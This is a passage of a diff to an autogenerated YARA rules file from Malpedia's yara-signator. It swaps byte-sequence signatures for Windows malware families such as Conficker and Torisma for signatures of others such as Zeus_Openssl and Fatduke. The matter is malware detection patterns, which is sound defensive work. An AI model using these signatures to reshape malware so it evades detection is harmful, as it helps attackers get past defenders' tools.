83c048 50 8d55d8 } - $sequence_2 = { e8???????? 33c0 8845bb c745c488020000 6888020000 e8???????? 83c404 } - $sequence_3 = { 83c404 8b08 51 e8???????? 83c410 } - $sequence_4 = { 8845d7 8b4d08 e8???????? 0fb6c8 85c9 0f85f6000000 8b5508 } - $sequence_5 = { 8d45e8 50 8b4d0c 51 e8???????? 83c404 50 } - $sequence_6 = { 33c0 8945e8 668945ec b902000000 6bd100 668b450c } - $sequence_7 = { 894508 8b4d08 3b4d0c 7427 8b5508 } - $sequence_8 = { 8965d8 8b45e4 83c00c 50 e8???????? e8???????? 8b4de4 } - $sequence_9 = { 8b55e0 52 6a01 8b4df0 e8???????? c645fc03 8d8d38ffffff } + $sequence_0 = { 894648 8b7a4c 897e4c 837a4c10 7706 } + $sequence_1 = { 03f3 c706652b3030 8d4604 33d2 e9???????? 8bd1 c745c409000000 } + $sequence_2 = { 83f826 7603 6a26 58 0fb60c85be534700 0fb63485bf534700 } + $sequence_3 = { b9fe020000 3bc1 0f4fc1 8d8decfcffff 50 8985e8fcffff e8???????? } + $sequence_4 = { 3bf0 730a 8bc6 89742410 897c2414 50 ff7508 } + $sequence_5 = { 8d45fc 50 8bd6 e8???????? 8b7508 8bf8 59 } + $sequence_6 = { 8bf2 57 8bf9 8d4e02 668b06 83c602 6685c0 } + $sequence_7 = { 85c0 740c 8d432c 8945f8 8b00 } + $sequence_8 = { 8945d8 8b45e8 5e 13ce f765e0 6a00 8945ec } + $sequence_9 = { 59 c3 8b4c240c 68???????? e8???????? 8b44240c 5e } condition: - 7 of them and filesize <1433600 + 7 of them and filesize <1518592 } -rule MALPEDIA_Win_Ldr4_Auto : FILE +rule MALPEDIA_Win_Vapor_Rage_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ccab43fe-6663-5ab0-9f9d-f8403f8cf5d7" + id = "11bddf4b-6d86-5af5-ae51-c6d26a16eb1c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ldr4_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vapor_rage_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "78a7719e8cf0704f5c76c874cc1f41ecbae742c2d4a4b3ef70df1b0258c1fe71" + logic_hash = "be731f13a1ff78238c54efa2479336e60a09907f2a709db9a3ea573dd84f70f8" score = 75 quality = 75 tags = "FILE" @@ -165767,32 +168579,32 @@ rule MALPEDIA_Win_Ldr4_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff750c 0fb745f0 ff7508 50 0fb745ee 50 0fb745ec } - $sequence_1 = { c9 c20c00 56 6a2f ff74240c e8???????? 6a3f } - $sequence_2 = { 6a00 53 ff15???????? 837df800 0f8528010000 8d45f4 } - $sequence_3 = { 53 56 57 8945f8 33c0 33db 6a3e } - $sequence_4 = { 7506 6683f901 7723 83c720 66893b eb04 8365fc00 } - $sequence_5 = { 8d442410 50 8b442420 358555f261 50 8bc3 e8???????? } - $sequence_6 = { ff15???????? 8bf0 85f6 742c 33c9 85db 7622 } - $sequence_7 = { 8d8d00feffff 51 e8???????? 85c0 757e } - $sequence_8 = { 8d42f8 d1e8 3955fc 7c3e 85c0 } - $sequence_9 = { 0f84f1010000 8b3d???????? 50 ffd7 ff750c 8945e8 ffd7 } + $sequence_0 = { 6a07 e8???????? e8???????? e8???????? e8???????? 8325????????00 c745fcfeffffff } + $sequence_1 = { 6a00 0fb755b0 52 8b45ac 50 } + $sequence_2 = { 5f 5e c3 68???????? ff15???????? c3 } + $sequence_3 = { 32db 885de7 c745fcfeffffff e8???????? 84db 0f8564ffffff } + $sequence_4 = { 885de7 c745fcfeffffff e8???????? 84db 0f8564ffffff e8???????? } + $sequence_5 = { 6a1f 8b4de4 51 ff15???????? } + $sequence_6 = { 8b55f8 81ca80000000 8955f8 6a04 8d45f8 50 6a1f } + $sequence_7 = { eb59 48 a3???????? e8???????? } + $sequence_8 = { 894df8 8b55f8 81ca80000000 8955f8 6a04 8d45f8 } + $sequence_9 = { f2c3 f2e94e030000 55 8bec 5d e9???????? 55 } condition: - 7 of them and filesize <117760 + 7 of them and filesize <296960 } -rule MALPEDIA_Win_Royalcli_Auto : FILE +rule MALPEDIA_Win_Fatduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8a3d9888-c19a-51e8-8633-e1429e45af66" + id = "1df82884-dd37-5110-97a3-f389ea498843" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.royalcli_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fatduke_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "5cdfe5e738245420de8a121061e185e2740c336e09d01f0babed3f279bcde56b" + logic_hash = "40661bdfa7c29a9f9d4cfc7da5ee8f1460f5e36e7c11bd94001d922b76261842" score = 75 quality = 75 tags = "FILE" @@ -165806,32 +168618,32 @@ rule MALPEDIA_Win_Royalcli_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 41 3bcf 7cb5 56 } - $sequence_1 = { e8???????? 33f6 83c42c 3bc6 0f8c19050000 83bda4feffff1c 0f8c0c050000 } - $sequence_2 = { 5d c3 56 ff15???????? 5b 5f 33c0 } - $sequence_3 = { 898dccf9ffff 7d10 33c0 8b4dfc } - $sequence_4 = { 8b08 8d954cf7ffff 52 68???????? } - $sequence_5 = { 33f6 ff15???????? e9???????? 8b4708 } - $sequence_6 = { 6a01 50 e8???????? 56 8945dc e8???????? 8b55e0 } - $sequence_7 = { 83c414 8955e4 2bd0 8d9b00000000 } - $sequence_8 = { 8bbdd4f9ffff 8b9dc4f9ffff 807c3b0f00 751c 8b4b08 8b5508 } - $sequence_9 = { 50 e8???????? 6820010000 8d8dc0fdffff 56 51 e8???????? } + $sequence_0 = { 807b0d00 7552 ff7608 8bc8 e8???????? 8b36 8d7b10 } + $sequence_1 = { 8bcb 85f6 7455 83ee04 7211 8b01 3b02 } + $sequence_2 = { ff75f0 c746140f000000 c7461000000000 c60600 e8???????? 8b4b04 83c404 } + $sequence_3 = { e8???????? c745c000000000 c745c400000000 c745c40f000000 c745c000000000 c645b000 3bc1 } + $sequence_4 = { e8???????? 83c404 c745bc0f000000 c745b800000000 c645a800 c745fcffffffff 837dec10 } + $sequence_5 = { c7864c01000000000000 c6863c01000000 c645fc0b 83be3801000010 720e ffb624010000 e8???????? } + $sequence_6 = { f7d3 23da 7419 2bf9 8bff 8a040f 8d4901 } + $sequence_7 = { 83ec1c a1???????? 33c5 8945fc 8b4508 8b4910 8945e4 } + $sequence_8 = { 8d4e08 51 e8???????? c745fcffffffff 8bc6 8b4df4 64890d00000000 } + $sequence_9 = { ff75c0 e8???????? 83c404 c745d40f000000 8ac3 c745d000000000 c645c000 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <9012224 } -rule MALPEDIA_Win_Interception_Auto : FILE +rule MALPEDIA_Win_Stegoloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f1a298d5-70e2-5f27-b6ee-691574cd9abf" + id = "e9d6ede2-9401-5de2-b06b-905a99f741c9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.interception_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stegoloader_auto.yar#L1-L174" license_url = "N/A" - logic_hash = "3520af3329a4b24d818d777e1e8f70b92d9cafa69a1f58bf6db64da9ed00530f" + logic_hash = "b778718a0682061dce35a7f47c0081e22977d884e10f4fca4ca7c1e5214e1ed2" score = 75 quality = 75 tags = "FILE" @@ -165845,32 +168657,38 @@ rule MALPEDIA_Win_Interception_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e61f 8d1c8520ae0010 c1e603 8b03 f644300401 7469 57 } - $sequence_1 = { 72f1 56 8bf1 c1e603 3b96e8710010 } - $sequence_2 = { c1f805 83e61f 8d1c8520ae0010 c1e603 8b03 } - $sequence_3 = { ffb6ec710010 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff } - $sequence_4 = { 8bd0 c1f905 83e21f 8b0c8d20ae0010 f644d10401 } - $sequence_5 = { 8d3c8520ae0010 c1e603 8b07 03c6 f6400401 7437 } - $sequence_6 = { f683c19c001004 7406 8816 46 } - $sequence_7 = { 8d542434 f3ab 66ab aa } - $sequence_8 = { 8bc8 83e01f c1f905 8b0c8d20ae0010 8a44c104 } - $sequence_9 = { 731c 8bc8 83e01f c1f905 8b0c8d20ae0010 f644c10401 8d04c1 } + $sequence_0 = { f7db 1bdb f7d3 235dfc 3bdf 7409 } + $sequence_1 = { 4a 75f0 8a043e 46 84c0 7669 0fb6c0 } + $sequence_2 = { 59 eb32 8bc8 837db806 } + $sequence_3 = { 59 7422 43 3b5e14 76e2 ff45fc 837dfc02 } + $sequence_4 = { 0f84f9010000 c645a443 c645a54d c645a644 } + $sequence_5 = { c645e968 c645ea65 c645eb6c c645ec6c c645ed5f c645ee54 c645ef72 } + $sequence_6 = { 7415 ff75f4 8bcb ff7604 } + $sequence_7 = { 8d0481 8b0438 03c7 3bc6 720e 8b4df0 03ce } + $sequence_8 = { ff742414 8bce ff5004 84c0 } + $sequence_9 = { 03df 8b03 03c7 33c9 3808 7407 } + $sequence_10 = { 8d0448 0fb70438 eb07 662b5e10 0fb7c3 8b4e1c } + $sequence_11 = { 83c604 4b 890411 75db eb0a } + $sequence_12 = { 33db 56 668945f4 83c002 33f6 3bd3 } + $sequence_13 = { 7e68 8b4d0c 8b4508 53 56 57 8b7d10 } + $sequence_14 = { 7409 8b01 6a01 ff10 897d0c } + $sequence_15 = { 8a4510 f6d8 1bc0 83e004 894510 e8???????? 3bc3 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <802816 } -rule MALPEDIA_Win_Htbot_Auto : FILE +rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9061a5e4-8534-51fe-80a9-1a440b66e0d7" + id = "8c3065fc-d922-5a5a-97bb-f5578c899954" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.htbot_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_openssl_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "90f98baa748c169d2b4b8297454f9f854e4138797b2c83ac6d83acccfa4dd9b0" + logic_hash = "87e8b70576343bf43fa1d91175bc18c4648aa0bc5e7b7de2b8eae5131a311e26" score = 75 quality = 75 tags = "FILE" @@ -165884,32 +168702,32 @@ rule MALPEDIA_Win_Htbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 68???????? 51 ff15???????? 85c0 7524 } - $sequence_1 = { 56 57 8b7c2440 8b474c 89442414 c7474c00000000 } - $sequence_2 = { 8908 8b15???????? 8d0c52 83c2ff a3???????? 8d4488f8 8b0d???????? } - $sequence_3 = { 8b11 50 8b4204 ffd0 8bc5 e9???????? 8d77f0 } - $sequence_4 = { 51 8bc8 ffd2 8bf8 85ff 0f84ccfeffff 8b4604 } - $sequence_5 = { 83f801 7e68 8d4d02 6a22 51 } - $sequence_6 = { 83c010 894510 c684244402000003 a1???????? 8b500c b9???????? ffd2 } - $sequence_7 = { 8903 c744241c00000000 8b7c2424 8b4708 83c708 8378f400 c744241001000000 } - $sequence_8 = { 83c010 894514 c684244402000004 a1???????? 8b500c } - $sequence_9 = { 51 ff15???????? 8d46f0 8d500c 83c9ff f00fc10a 49 } + $sequence_0 = { c1e205 2bd1 8bce c7460471000000 } + $sequence_1 = { eb04 807dfd05 7607 814a1800100100 8a4dfe } + $sequence_2 = { 8b45f4 8b4850 8b45d0 23c2 894dcc 8b0481 8bc8 } + $sequence_3 = { 895df0 0fb6de 0145f8 0fb745d2 0fb6ca 03cb bf01000000 } + $sequence_4 = { 48 7526 804dff04 884a01 eb19 804dff02 884a01 } + $sequence_5 = { 894a04 83c620 83c120 81fee00f0000 } + $sequence_6 = { 83c608 03d0 895dfc 8955f8 897df0 3b75cc 72dc } + $sequence_7 = { 8b8d7cffffff 830204 5e c70101000000 33c0 5b } + $sequence_8 = { 898bc41b0000 8b5dfc 2bf1 8b7df4 8bc8 c1e908 0fb6c9 } + $sequence_9 = { d1e8 83fe1f 7eeb 6683bfb800000000 7537 6683bfbc00000000 752d } condition: - 7 of them and filesize <196608 + 7 of them and filesize <4546560 } -rule MALPEDIA_Win_Mimic_Auto : FILE +rule MALPEDIA_Win_Nitol_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "868573b4-62fd-5cb9-b5b2-294037fc58d9" + id = "198cac67-df3a-5f33-8def-8dcd3146a557" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mimic_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nitol_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "254f11d4299c867206c2f429f422756a353d8d6c35de138faa70cb17074bdf11" + logic_hash = "e9d7d8e217f108c3161acd931dc4e0ba15adf22ad1ef941917cfc7f75a6244b1" score = 75 quality = 75 tags = "FILE" @@ -165923,32 +168741,32 @@ rule MALPEDIA_Win_Mimic_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7f4a 7c05 3945e0 7343 8b55dc 83fa08 0f82b4000000 } - $sequence_1 = { 81fe2c010000 7f1d 68e8030000 ffd7 ffd3 85c0 74dd } - $sequence_2 = { 837db810 51 0f4345a4 8d4d84 03c2 50 e8???????? } - $sequence_3 = { a3???????? 8b8548feffff 894804 8d8d30feffff e8???????? 6a20 ffb530feffff } - $sequence_4 = { 0f43c2 0f43da 8d0470 8db5ccfdffff 8bc8 0f43f2 33ff } - $sequence_5 = { 42 41 3bd6 7cf4 3bd6 751f 6a61 } - $sequence_6 = { c745fc02000000 a801 743a 83e0fe 894584 83ff08 } - $sequence_7 = { 50 ffd6 68???????? c645fc40 e8???????? } - $sequence_8 = { 8d8d18ffffff e9???????? 8d4dc0 e9???????? 8d4dd8 e9???????? 8b542408 } - $sequence_9 = { 8b483c 898424e4000000 89ac24e0000000 894c2438 0f1f4000 0f1f840000000000 8bb424fc010000 } + $sequence_0 = { 8945d0 885dd4 c645d506 ffd6 668945d6 } + $sequence_1 = { 50 ff15???????? 6860ea0000 8945f8 66895de8 e8???????? 59 } + $sequence_2 = { ff742430 ffd7 8d442430 55 50 53 56 } + $sequence_3 = { 7424 48 0f85c0fdffff 6a01 } + $sequence_4 = { 8b35???????? 833d????????01 7465 ffd6 6a0a 99 59 } + $sequence_5 = { 8bf8 8bcf 8b07 ff5068 85c0 8945ec 7457 } + $sequence_6 = { 7524 8d8594feffff 50 8d8514ffffff 50 8d8514faffff 68???????? } + $sequence_7 = { 7419 4a 7416 4a 7406 c6043778 eb1b } + $sequence_8 = { 53 ff15???????? e9???????? 6a40 33c0 } + $sequence_9 = { ff15???????? 53 8d8df8fcffff 6a0a } condition: - 7 of them and filesize <4204544 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Dyepack_Auto : FILE +rule MALPEDIA_Win_Kegotip_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66b3574f-c7a6-53f0-85d5-ab2a32e5f41d" + id = "00ad7f0a-dc8e-510c-a1d3-35279f77a6e7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dyepack_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kegotip_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "9d7b8dddf2871fef90109ccabdb579a142d1f80f2c5a6a3cb7a4f53499a52084" + logic_hash = "32b69314873829a2218a5374ade1e7ef8ad560cb68aa690aa8ede1fd50d9aa93" score = 75 quality = 75 tags = "FILE" @@ -165956,38 +168774,38 @@ rule MALPEDIA_Win_Dyepack_Auto : FILE tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { 53 53 56 ffd7 8b442414 8b4c2410 33ed } - $sequence_1 = { 7cb2 7f08 8b4c2410 3be9 } - $sequence_2 = { 8b442414 8b4c2410 33ed 33ff 3bc3 7c60 7f0a } - $sequence_3 = { 741e 8b442418 3bc3 7416 03e8 8b442414 13fb } - $sequence_4 = { 1bc7 7815 7f08 81f900100000 } - $sequence_5 = { 56 ff15???????? 8b8c2428100000 53 51 } - $sequence_6 = { 3bcb 765a eb04 8b4c2410 2bcd } - $sequence_7 = { ff15???????? 85c0 741e 8b442418 3bc3 7416 03e8 } - $sequence_8 = { 5f 5e 5b 81c414100000 c3 8b3d???????? } - $sequence_9 = { ffd7 8d4c2418 53 51 8d54242c } + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { eb6d e9???????? eb63 c745f400000000 } + $sequence_1 = { e8???????? 83c40c c705????????94000000 68???????? } + $sequence_2 = { 83c201 8955ec 8b45f8 83c004 8945f8 } + $sequence_3 = { 89420c 8b4dfc c7412400000000 8b55fc a1???????? 894210 6a10 } + $sequence_4 = { 8b55f8 83c201 8955f8 ebe0 8b45f8 0fbe08 } + $sequence_5 = { 6800100000 6800000800 6a00 ff15???????? 8945fc 837dfc00 7504 } + $sequence_6 = { 0f8592000000 8b4508 0345e8 0fb648ff 51 } + $sequence_7 = { 52 8b4508 50 8d4df4 51 6a00 68???????? } + $sequence_8 = { 8b85fcfdffff 0fbe8c0500feffff 83f97a 7f1e 8b95fcfdffff 0fbe841500feffff 83e820 } + $sequence_9 = { 8d85b0feffff 50 6a00 8d8dd8feffff 51 ff15???????? } condition: - 7 of them and filesize <212992 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE +rule MALPEDIA_Win_Curator_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6a23a7a3-8360-570b-be01-5aa731924fe0" + id = "fc957193-82db-5d48-97f1-8bf3e9847701" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crypto_fortress_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.curator_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "cb9e8ad6d0528bcc920d7d8992919925e873e6ab7fd21de603b21e974fe6d2be" + logic_hash = "a3bde063a66b4d9394e6eeb42680e73ad8b937005775febd69fd7690156b149c" score = 75 quality = 75 tags = "FILE" @@ -166001,32 +168819,32 @@ rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffb5a8feffff e8???????? 68???????? ffb5a8feffff e8???????? } - $sequence_1 = { a3???????? 68???????? ff35???????? e8???????? 85c0 0f846f030000 } - $sequence_2 = { aa 3407 aa 045a aa } - $sequence_3 = { e8???????? 85c0 0f846f030000 a3???????? 68???????? ff35???????? e8???????? } - $sequence_4 = { ff35???????? e8???????? 85c0 0f8456060000 a3???????? 8d3dccec4000 33c0 } - $sequence_5 = { 2cff aa 2cf9 aa 2c4c } - $sequence_6 = { aa 2c4e aa 0444 aa 2cff aa } - $sequence_7 = { c9 c20800 55 8bec 83c4f8 8b4508 } - $sequence_8 = { aa 341b aa 2c27 aa 3441 aa } - $sequence_9 = { aa 340a aa 3421 aa 0433 aa } + $sequence_0 = { 428a8c01e0590600 482bd0 8b42fc d3e8 49895708 41894718 0fb60a } + $sequence_1 = { 4903c1 483bc3 0f84b3000000 4983c004 413bca 72e0 488d6b10 } + $sequence_2 = { 7507 8bc6 e9???????? 44396728 0f8527010000 8d14f5ffffffff 488d4c2458 } + $sequence_3 = { 448b542424 be01000000 389c24b8000000 7449 385c2420 } + $sequence_4 = { 8b4308 25ffffff0f 3dffffff0f 740b 488b03 488bd8 4885c0 } + $sequence_5 = { 660f7ef9 d1c1 894a30 660f6dff 660f7ef9 c1c10a 890a } + $sequence_6 = { f60708 7505 4885c0 7508 48c7432000409901 488b5c2438 4883c420 } + $sequence_7 = { 4183fc01 740b 41bc01000000 e9???????? 488b4dd7 e8???????? 488b4ddf } + $sequence_8 = { 0f843ffeffff 488d55c0 488d4db0 e8???????? e9???????? 488d46ff 488905???????? } + $sequence_9 = { 0f4ed0 e8???????? 488d1517130400 488d4c2420 e8???????? cc } condition: - 7 of them and filesize <188416 + 7 of them and filesize <1265664 } -rule MALPEDIA_Win_Conficker_Auto : FILE +rule MALPEDIA_Win_Flagpro_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3a6101de-ccfd-52f9-bf48-95f37d3da01a" + id = "a8700192-f3cd-586a-895f-7ccfc513b903" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.conficker_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flagpro_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "a2e85b8534ced36c659844072e09fbb061c134856a103a96122c39a859220309" + logic_hash = "21ab8654968f01505a5a06c6c338da8446a910a647e36c5322e4febf20ea2d89" score = 75 quality = 75 tags = "FILE" @@ -166040,32 +168858,32 @@ rule MALPEDIA_Win_Conficker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ebe4 f60638 75a8 b008 d0ef 1400 } - $sequence_1 = { df6de8 51 df6df8 51 } - $sequence_2 = { 8bec 83ec20 8b0d???????? a1???????? 8365f800 56 } - $sequence_3 = { 3c04 7415 42 42 60 b066 f2ae } - $sequence_4 = { c3 6a10 68???????? e8???????? 68???????? ff15???????? } - $sequence_5 = { 3345f8 33c7 33c6 50 ff15???????? 59 5f } - $sequence_6 = { 8b4508 33d2 8910 895004 33c9 894c8808 41 } - $sequence_7 = { 8d85f8fbffff ff7510 50 e8???????? } - $sequence_8 = { 8954241c 61 c3 ac } - $sequence_9 = { 55 8bec 83ec20 8b0d???????? a1???????? } + $sequence_0 = { 8d8c2480000000 e8???????? 56 c784249c45010001000000 e8???????? } + $sequence_1 = { 57 6a00 6a00 6aff 68???????? } + $sequence_2 = { ffd0 c684249400000002 8b442430 3bc3 7408 8b08 8b5108 } + $sequence_3 = { 56 57 85c0 740b b900030000 8bf3 } + $sequence_4 = { 8b442428 3bc3 749d eb93 8b442428 8d54243c 895c243c } + $sequence_5 = { ba10000000 8d6e04 395618 7221 8b4500 eb1e } + $sequence_6 = { 39ac24c8000000 7210 8b9424b4000000 52 e8???????? 83c404 899c24c8000000 } + $sequence_7 = { 33ed 55 68???????? 8d842488030000 50 ff15???????? 8db4243c010000 } + $sequence_8 = { 8bf0 83c408 3bf3 7571 57 } + $sequence_9 = { 68???????? 8d8424880c0000 6800040000 50 } condition: - 7 of them and filesize <335872 + 7 of them and filesize <1411072 } -rule MALPEDIA_Win_Torisma_Auto : FILE +rule MALPEDIA_Win_Polpo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a1ed0c86-448e-5725-a3d9-4e9a8d06915c" + id = "f09c9fa9-68a5-510c-9c07-2bf30033e8be" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.torisma_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polpo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polpo_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "5ec5e797b8010193d7caa6926dd920962119b17c8339298b3be41306fc75b6f7" + logic_hash = "d086587d6209a1b4d39f14c8bf11bcdd8bb5ac2527f8607c317abb5534459f55" score = 75 quality = 75 tags = "FILE" @@ -166079,35 +168897,32 @@ rule MALPEDIA_Win_Torisma_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 3d83490000 7507 b883490000 } - $sequence_1 = { 7402 eb05 e9???????? b833280000 } - $sequence_2 = { e8???????? 3d514b0000 7504 33c0 } - $sequence_3 = { 488b4c2470 e8???????? 89442458 817c245870100000 } - $sequence_4 = { 030cb540ef0110 eb02 8bca f641247f 759b } - $sequence_5 = { b833280000 5f 5e 8be5 5d } - $sequence_6 = { 8b55fc 833a00 740c 8b45fc 8b08 51 } - $sequence_7 = { 488d442440 488bf8 33c0 b928000000 } - $sequence_8 = { 8b4c2430 488b542450 89048a ebb5 } - $sequence_9 = { 817dd833280000 7507 c745f433280000 eb07 c745f433280000 } - $sequence_10 = { c68424e1000000e9 c68424e2000000c3 c68424e3000000a5 c68424e400000090 } - $sequence_11 = { ff2495c0d50010 8bc7 ba03000000 83e904 720c 83e003 } - $sequence_12 = { c1e006 0b442414 88442410 8b442440 } + $sequence_0 = { 6800040000 8d8decfbffff 51 50 ffd7 6a00 } + $sequence_1 = { 50 8d85ecf7ffff 50 8d8decfbffff 51 ff15???????? 40 } + $sequence_2 = { 6a02 52 ff15???????? 8b03 50 ff15???????? } + $sequence_3 = { c1e606 03348540b30120 8b45f8 8b00 8906 } + $sequence_4 = { 57 33c0 6806020000 898d98f9ffff 50 8d8df6fdffff 51 } + $sequence_5 = { 8d854cffffff 8bd0 8d642400 8a08 40 3acb 75f9 } + $sequence_6 = { 52 50 ff15???????? 6a00 6800040000 8d8dfcfaffff 68???????? } + $sequence_7 = { 8a08 40 3acb 75f9 2bc6 8dbd4cf7ffff } + $sequence_8 = { 51 8985d0dfffff 8985d4dfffff 8885dcdfffff e8???????? } + $sequence_9 = { ffd6 85c0 8b859cfdffff 50 0f8516020000 ff15???????? 8d45a4 } condition: - 7 of them and filesize <322560 + 7 of them and filesize <250880 } -rule MALPEDIA_Win_Doublefinger_Auto : FILE +rule MALPEDIA_Win_Hopscotch_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9629155b-05c7-5ae4-a87c-14586b484d59" + id = "dd6bd925-f81a-5efa-b164-a58190829fd7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doublefinger_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hopscotch_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "1175dbcf7260ce52fd0cde8ae4e3d3c47c27ca77b65a7696e2bad6350a2d51d5" + logic_hash = 